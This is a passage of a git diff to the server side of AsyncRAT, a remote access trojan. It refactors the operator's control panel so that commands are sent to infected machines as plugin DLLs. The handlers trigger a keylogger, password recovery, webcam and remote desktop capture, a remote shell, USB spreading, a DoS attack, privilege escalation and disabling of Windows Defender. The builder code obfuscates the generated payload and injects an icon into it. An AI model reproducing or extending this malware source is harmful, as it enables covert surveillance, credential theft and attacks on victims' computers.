+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Extra.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void SendMessageBoxToolStripMenuItem1_Click(object sender, EventArgs e)
{
- string Msgbox = Interaction.InputBox("Message", "Message", "Hello World!");
- if (string.IsNullOrEmpty(Msgbox))
- return;
- else
+ try
{
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "sendMessage";
- msgpack.ForcePathObject("Message").AsString = Msgbox;
- foreach (Clients client in GetSelectedClients())
+ string Msgbox = Interaction.InputBox("Message", "Message", "Hello World!");
+ if (string.IsNullOrEmpty(Msgbox))
+ return;
+ else
{
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendMessage";
+ packet.ForcePathObject("Message").AsString = Msgbox;
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Extra.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
+ foreach (Clients client in GetSelectedClients())
+ {
+ ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ }
}
}
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void RemoteDesktopToolStripMenuItem1_Click(object sender, EventArgs e)
{
try
{
- //DLL Plugin
- //msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
- //msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.PluginDesktop);
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
- msgpack.ForcePathObject("Option").AsString = "capture";
- msgpack.ForcePathObject("Quality").AsInteger = 30;
+ //DLL Plugin
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\RemoteDesktop.dll"));
foreach (Clients client in GetSelectedClients())
{
FormRemoteDesktop remoteDesktop = (FormRemoteDesktop)Application.OpenForms["RemoteDesktop:" + client.ID];
@@ -668,7 +739,11 @@ namespace Server
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void KeyloggerToolStripMenuItem1_Click(object sender, EventArgs e)
@@ -676,8 +751,9 @@ namespace Server
try
{
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "keyLogger";
- msgpack.ForcePathObject("isON").AsString = "true";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\LimeLogger.dll"));
+
foreach (Clients client in GetSelectedClients())
{
FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + client.ID];
@@ -688,14 +764,17 @@ namespace Server
Name = "keyLogger:" + client.ID,
Text = "keyLogger:" + client.ID,
F = this,
- Client = client
};
KL.Show();
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void ChatToolStripMenuItem1_Click(object sender, EventArgs e)
@@ -704,21 +783,25 @@ namespace Server
{
foreach (Clients client in GetSelectedClients())
{
- FormChat shell = (FormChat)Application.OpenForms["chat:" + client.ID];
- if (shell == null)
+ FormChat chat = (FormChat)Application.OpenForms["chat:" + client.ID];
+ if (chat == null)
{
- shell = new FormChat
+ chat = new FormChat
{
Name = "chat:" + client.ID,
Text = "chat:" + client.ID,
F = this,
- Client = client
+ ParentClient = client
};
- shell.Show();
+ chat.Show();
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void FileManagerToolStripMenuItem1_Click(object sender, EventArgs e)
@@ -726,8 +809,9 @@ namespace Server
try
{
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "fileManager";
- msgpack.ForcePathObject("Command").AsString = "getDrivers";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\FileManager.dll"));
+
foreach (Clients client in GetSelectedClients())
{
FormFileManager fileManager = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
@@ -738,7 +822,6 @@ namespace Server
Name = "fileManager:" + client.ID,
Text = "fileManager:" + client.ID,
F = this,
- Client = client,
FullPath = Path.Combine(Application.StartupPath, "ClientsFolder", client.ID)
};
fileManager.Show();
@@ -746,7 +829,11 @@ namespace Server
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void PasswordRecoveryToolStripMenuItem1_Click(object sender, EventArgs e)
@@ -754,17 +841,21 @@ namespace Server
try
{
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
- msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.PluginRecovery);
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Recovery.dll"));
+
foreach (Clients client in GetSelectedClients())
{
- client.LV.ForeColor = Color.Red;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
new HandleLogs().Addmsg("Sending Password Recovery..", Color.Black);
tabControl1.SelectedIndex = 1;
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void ProcessManagerToolStripMenuItem1_Click(object sender, EventArgs e)
@@ -772,8 +863,9 @@ namespace Server
try
{
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "processManager";
- msgpack.ForcePathObject("Option").AsString = "List";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\ProcessManager.dll"));
+
foreach (Clients client in GetSelectedClients())
{
FormProcessManager processManager = (FormProcessManager)Application.OpenForms["processManager:" + client.ID];
@@ -784,22 +876,33 @@ namespace Server
Name = "processManager:" + client.ID,
Text = "processManager:" + client.ID,
F = this,
- Client = client
+ ParentClient = client
};
processManager.Show();
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
+ { }
}
private void BotsKillerToolStripMenuItem_Click(object sender, EventArgs e)
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "botKiller";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "botKiller";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
@@ -807,24 +910,36 @@ namespace Server
new HandleLogs().Addmsg("Sending Botkiller..", Color.Black);
tabControl1.SelectedIndex = 1;
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void USBSpreadToolStripMenuItem1_Click(object sender, EventArgs e)
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "limeUSB";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "usbSpread";
- msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.PluginUsbSpread);
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
- new HandleLogs().Addmsg("Sending USB Spread..", Color.Black);
- tabControl1.SelectedIndex = 1;
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
+ { }
}
private void RunToolStripMenuItem1_Click(object sender, EventArgs e)
@@ -836,61 +951,103 @@ namespace Server
return;
else
{
+ lock (Settings.LockReportWindowClients)
+ {
+ Settings.ReportWindowClients.Clear();
+ Settings.ReportWindowClients = new List();
+ }
+ Settings.ReportWindow = true;
+
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "reportWindow";
+ packet.ForcePathObject("Option").AsString = "run";
+ packet.ForcePathObject("Title").AsString = title;
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "reportWindow";
- msgpack.ForcePathObject("Option").AsString = "run";
- msgpack.ForcePathObject("Title").AsString = title;
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void StopToolStripMenuItem2_Click(object sender, EventArgs e)
{
-
try
{
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "reportWindow";
- msgpack.ForcePathObject("Option").AsString = "stop";
- foreach (Clients client in GetSelectedClients())
- {
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
- }
+ Settings.ReportWindow = false;
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "reportWindow";
+ packet.ForcePathObject("Option").AsString = "stop";
+ lock (Settings.LockReportWindowClients)
+ foreach (Clients clients in Settings.ReportWindowClients)
+ {
+ ThreadPool.QueueUserWorkItem(clients.Send, packet.Encode2Bytes());
+ }
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
}
- catch { }
}
private void CloseToolStripMenuItem1_Click(object sender, EventArgs e)
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "close";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "close";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void RestartToolStripMenuItem2_Click(object sender, EventArgs e)
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "restart";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "restart";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private async void UpdateToolStripMenuItem2_Click(object sender, EventArgs e)
@@ -900,19 +1057,28 @@ namespace Server
OpenFileDialog openFileDialog = new OpenFileDialog();
if (openFileDialog.ShowDialog() == DialogResult.OK)
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "sendFile";
+ await packet.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName);
+ packet.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName);
+ packet.ForcePathObject("Update").AsString = "true";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "sendFile";
- await msgpack.ForcePathObject("File").LoadFileAsBytes(openFileDialog.FileName);
- msgpack.ForcePathObject("Extension").AsString = Path.GetExtension(openFileDialog.FileName);
- msgpack.ForcePathObject("Update").AsString = "true";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\SendFile.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
- client.LV.ForeColor = Color.Red;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void UninstallToolStripMenuItem_Click(object sender, EventArgs e)
@@ -922,14 +1088,24 @@ namespace Server
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "uninstall";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "uninstall";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
}
@@ -937,48 +1113,75 @@ namespace Server
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "pcOptions";
+ packet.ForcePathObject("Option").AsString = "restart";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "pcOptions";
- msgpack.ForcePathObject("Option").AsString = "restart";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
- client.LV.ForeColor = Color.Red;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void ShutdownToolStripMenuItem1_Click(object sender, EventArgs e)
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "pcOptions";
+ packet.ForcePathObject("Option").AsString = "shutdown";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "pcOptions";
- msgpack.ForcePathObject("Option").AsString = "shutdown";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
- client.LV.ForeColor = Color.Red;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void LogoffToolStripMenuItem1_Click(object sender, EventArgs e)
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "pcOptions";
+ packet.ForcePathObject("Option").AsString = "logoff";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "pcOptions";
- msgpack.ForcePathObject("Option").AsString = "logoff";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
- client.LV.ForeColor = Color.Red;
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void ShowFolderToolStripMenuItem_Click(object sender, EventArgs e)
@@ -994,7 +1197,11 @@ namespace Server
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void SeedTorrentToolStripMenuItem1_Click_1(object sender, EventArgs e)
@@ -1009,8 +1216,14 @@ namespace Server
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "shell";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "shell";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
FormShell shell = (FormShell)Application.OpenForms["shell:" + client.ID];
@@ -1021,23 +1234,45 @@ namespace Server
Name = "shell:" + client.ID,
Text = "shell:" + client.ID,
F = this,
- Client = client
};
shell.Show();
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
- private readonly FormDOS formDOS = new FormDOS();
+ private readonly FormDOS formDOS;
private void DOSAttackToolStripMenuItem_Click_1(object sender, EventArgs e)
{
- if (listView1.Items.Count > 0)
+ try
{
- formDOS.Show();
+ if (listView1.Items.Count > 0)
+ {
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "dosAdd";
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
+ foreach (Clients client in GetSelectedClients())
+ {
+ ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ }
+ formDOS.Show();
+ }
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
}
}
@@ -1070,28 +1305,37 @@ namespace Server
private void PASSWORDRECOVERYToolStripMenuItem_Click(object sender, EventArgs e)
{
- if (listView4.Items.Count > 0)
+ try
{
- foreach (ListViewItem item in listView4.Items)
+ if (listView4.Items.Count > 0)
{
- if (item.Text == "Recovery Password")
+ foreach (ListViewItem item in listView4.Items)
{
- return;
+ if (item.Text == "Recovery Password")
+ {
+ return;
+ }
}
}
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Recovery.dll"));
+
+ ListViewItem lv = new ListViewItem();
+ lv.Text = "Recovery Password";
+ lv.SubItems.Add("0");
+ lv.ToolTipText = Guid.NewGuid().ToString();
+ listView4.Items.Add(lv);
+ listView4.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
+
+ getTasks.Add(new AsyncTask(msgpack.Encode2Bytes(), lv.ToolTipText));
+ }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
}
-
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
- msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.PluginRecovery);
- ListViewItem lv = new ListViewItem();
- lv.Text = "Recovery Password";
- lv.SubItems.Add("0");
- lv.ToolTipText = Guid.NewGuid().ToString();
- listView4.Items.Add(lv);
- listView4.AutoResizeColumns(ColumnHeaderAutoResizeStyle.HeaderSize);
-
- getTasks.Add(new AsyncTask(msgpack.Encode2Bytes(), lv.ToolTipText));
}
private void GetAdminPrivilegesToolStripMenuItem_Click_1(object sender, EventArgs e)
@@ -1101,8 +1345,14 @@ namespace Server
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "uac";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "uac";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Options.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
if (client.LV.SubItems[lv_admin.Index].Text != "Administrator")
@@ -1111,7 +1361,11 @@ namespace Server
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
}
@@ -1122,8 +1376,14 @@ namespace Server
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "disableDefedner";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "defender";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Extra.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
if (client.LV.SubItems[lv_admin.Index].Text == "Admin")
@@ -1132,36 +1392,37 @@ namespace Server
}
}
}
- catch { }
- }
- }
-
- private void DisableNetStatToolStripMenuItem_Click(object sender, EventArgs e)
- {
- try
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "netStat";
- foreach (Clients client in GetSelectedClients())
+ catch (Exception ex)
{
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ MessageBox.Show(ex.Message);
+ return;
}
+ { }
}
- catch { }
}
private void BlankScreenToolStripMenuItem_Click(object sender, EventArgs e)
{
try
{
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "blankscreen";
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "blankscreen";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Extra.dll"));
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
foreach (Clients client in GetSelectedClients())
{
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
private void WebcamToolStripMenuItem_Click(object sender, EventArgs e)
@@ -1169,8 +1430,9 @@ namespace Server
try
{
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "webcam";
- msgpack.ForcePathObject("Command").AsString = "getWebcams";
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\RemoteCamera.dll"));
+
foreach (Clients client in GetSelectedClients())
{
FormWebcam remoteDesktop = (FormWebcam)Application.OpenForms["Webcam:" + client.ID];
@@ -1189,7 +1451,32 @@ namespace Server
}
}
}
- catch { }
+ catch (Exception ex)
+ {
+ MessageBox.Show(ex.Message);
+ return;
+ }
}
+
+ //private void ReSendPluginsToolStripMenuItem_Click(object sender, EventArgs e)
+ //{
+ // try
+ // {
+ // MsgPack msgpack = new MsgPack();
+ // msgpack.ForcePathObject("Packet").AsString = "cleanPlugin";
+ // foreach (Clients client in GetSelectedClients())
+ // {
+ // ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ // }
+ // }
+ // catch (Exception ex)
+ // {
+ // MessageBox.Show(ex.Message);
+ // return;
+ // }
+ //}
+
+ [DllImport("uxtheme", CharSet = CharSet.Unicode)]
+ public static extern int SetWindowTheme(IntPtr hWnd, string textSubAppName, string textSubIdList);
}
}
diff --git a/AsyncRAT-C#/Server/Forms/Form1.resx b/AsyncRAT-C#/Server/Forms/Form1.resx
index b503ef2..bb87df5 100644
--- a/AsyncRAT-C#/Server/Forms/Form1.resx
+++ b/AsyncRAT-C#/Server/Forms/Form1.resx
@@ -610,9 +610,6 @@
693, 65
-
- 1045, 65
-
112
diff --git a/AsyncRAT-C#/Server/Forms/FormBuilder.cs b/AsyncRAT-C#/Server/Forms/FormBuilder.cs
index 45367fe..38bb926 100644
--- a/AsyncRAT-C#/Server/Forms/FormBuilder.cs
+++ b/AsyncRAT-C#/Server/Forms/FormBuilder.cs
@@ -199,25 +199,22 @@ namespace Server.Forms
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
{
btnBuild.Enabled = false;
- await Task.Run(() =>
+ WriteSettings(asmDef);
+ if (chkObfu.Checked)
{
- WriteSettings(asmDef);
- if (chkObfu.Checked)
- {
- EncryptString.DoEncrypt(asmDef);
- Renaming.DoRenaming(asmDef);
- }
- asmDef.Write(saveFileDialog1.FileName);
- asmDef.Dispose();
- if (btnAssembly.Checked)
- {
- WriteAssembly(saveFileDialog1.FileName);
- }
- if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text))
- {
- IconInjector.InjectIcon(saveFileDialog1.FileName, txtIcon.Text);
- }
- });
+ //EncryptString.DoEncrypt(asmDef);
+ Renaming.DoRenaming(asmDef);
+ }
+ asmDef.Write(saveFileDialog1.FileName);
+ asmDef.Dispose();
+ if (btnAssembly.Checked)
+ {
+ WriteAssembly(saveFileDialog1.FileName);
+ }
+ if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text))
+ {
+ IconInjector.InjectIcon(saveFileDialog1.FileName, txtIcon.Text);
+ }
MessageBox.Show("Done!", "AsyncRAT | Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
SaveSettings();
this.Close();
diff --git a/AsyncRAT-C#/Server/Forms/FormCertificate.Designer.cs b/AsyncRAT-C#/Server/Forms/FormCertificate.Designer.cs
index ea4c21c..9283b38 100644
--- a/AsyncRAT-C#/Server/Forms/FormCertificate.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormCertificate.Designer.cs
@@ -84,7 +84,7 @@
this.Controls.Add(this.groupBox1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormCertificate";
- this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent;
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "Certificate";
this.Load += new System.EventHandler(this.FormCertificate_Load);
this.groupBox1.ResumeLayout(false);
diff --git a/AsyncRAT-C#/Server/Forms/FormChat.Designer.cs b/AsyncRAT-C#/Server/Forms/FormChat.Designer.cs
index 47dfb20..0aeeca7 100644
--- a/AsyncRAT-C#/Server/Forms/FormChat.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormChat.Designer.cs
@@ -52,6 +52,7 @@
// textBox1
//
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
+ this.textBox1.Enabled = false;
this.textBox1.Location = new System.Drawing.Point(0, 384);
this.textBox1.Name = "textBox1";
this.textBox1.Size = new System.Drawing.Size(757, 26);
@@ -60,7 +61,6 @@
//
// timer1
//
- this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
@@ -83,8 +83,8 @@
}
#endregion
- private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1;
- private System.Windows.Forms.Timer timer1;
+ public System.Windows.Forms.Timer timer1;
+ public System.Windows.Forms.TextBox textBox1;
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Forms/FormChat.cs b/AsyncRAT-C#/Server/Forms/FormChat.cs
index e6187fe..91b1c83 100644
--- a/AsyncRAT-C#/Server/Forms/FormChat.cs
+++ b/AsyncRAT-C#/Server/Forms/FormChat.cs
@@ -11,13 +11,17 @@ using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Threading;
+using System.IO;
+using Server.Algorithm;
namespace Server.Forms
{
public partial class FormChat : Form
{
public Form1 F { get; set; }
+ internal Clients ParentClient { get; set; }
internal Clients Client { get; set; }
+
private string Nickname = "Admin";
public FormChat()
{
@@ -26,7 +30,7 @@ namespace Server.Forms
private void TextBox1_KeyDown(object sender, KeyEventArgs e)
{
- if (e.KeyData == Keys.Enter && !string.IsNullOrWhiteSpace(textBox1.Text))
+ if (textBox1.Enabled && e.KeyData == Keys.Enter && !string.IsNullOrWhiteSpace(textBox1.Text))
{
richTextBox1.AppendText("ME: " + textBox1.Text + Environment.NewLine);
MsgPack msgpack = new MsgPack();
@@ -46,23 +50,31 @@ namespace Server.Forms
{
Nickname = nick;
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "chat";
- ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
